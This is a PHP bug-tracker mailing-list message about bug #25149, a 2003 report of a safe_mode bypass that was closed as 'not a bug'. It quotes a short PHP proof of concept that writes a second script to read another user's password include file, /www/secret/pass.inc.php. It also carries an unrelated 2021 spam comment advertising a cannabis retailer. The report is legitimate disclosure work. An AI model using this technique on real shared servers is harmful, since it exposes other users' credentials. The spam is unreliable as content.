Bug #25149 [Com]: safe_mode bypass

From: Date: Wed, 01 Sep 2021 18:53:20 +0000
Subject: Bug #25149 [Com]: safe_mode bypass
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-236347@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=25149&edit=1 ID: 25149 Comment by: lildurk25149 at gmail dot com Reported by: marrtins at hackers dot lv Summary: safe_mode bypass Status: Not a bug Type: Bug Package: Scripting Engine problem Operating System: Linux PHP Version: 4.3.1 Block user comment: N Private report: N New Comment: Lil Durk is a private agency dedicated to providing responsible access to legal cannabis for adults aged 19 and older. We’re an exclusively online retailer and wholesaler for recreational cannabis and a trusted source for information about cannabis and cannabis-related issues. We believe our work is meaningful and we take pride in our mandate to promote the socially responsible use of legal cannabis. https://lildurk.com/ Previous Comments: ------------------------------------------------------------------------ [2003-08-19 11:18:40] iliaa@php.net Thank you for taking the time to write to us, but this is not a bug. Please double-check the documentation available at http://www.php.net/manual/ and the instructions on how to report a bug at http://bugs.php.net/how-to-report.php This is how safe_mode works. ------------------------------------------------------------------------ [2003-08-19 11:15:33] marrtins at hackers dot lv Description: ------------ apache_1.3.27 httpd.conf ---------- User webmaster Group nobody ./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite ====================================== php-4.3.0 php.ini --------- safe_mode = On ./configure \ --with-mysql=/usr/local \ --with-mcrypt=/usr/local/lib/libmcrypt \ --with-apache=../apache_1.3.27 \ --enable-track-vars \ --with-gd=/usr/local \ --with-interbase=/opt/interbase \ --enable-trans-sid \ --with-png-dir=/usr/local \ --with-jpeg-dir=/usr/local \ --with-zlib-dir=/usr/local \ --enable-sockets \ --with-gettext \ --with-xml \ --enable-ftp \ --with-imap=/root/.hore_imp/imap-2002.RC10 \ --with-iconv=/usr/local/ ====================================== ~/public_html> ls -al * drwxr-xr-x 3 test users 4096 aug 19 19:05 . drwx--x--x 5 test users 4096 aug 19 19:04 .. -rw-r--r-- 1 test users 146 aug 19 18:47 hack.php drwxrwxrwx 2 test users 4096 aug 19 19:03 test after accessing http://some_server/~test/hack.php php makes test/stole.php ~/public_html> ls -al test drwxrwxrwx 2 test users 4096 aug 19 19:07 . drwxr-xr-x 3 test users 4096 aug 19 19:05 .. -rw-r--r-- 1 webmaste nobody 61 aug 19 19:07 stole.php after that http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php owned by webmaster Reproduce code: --------------- <? $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>'; $f=fopen('/home/test/public_html/test/stole.php', 'w'); fwrite($f, $data); fclose($f); ?> ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=25149&edit=1

« previous php.bugs (#236347) next »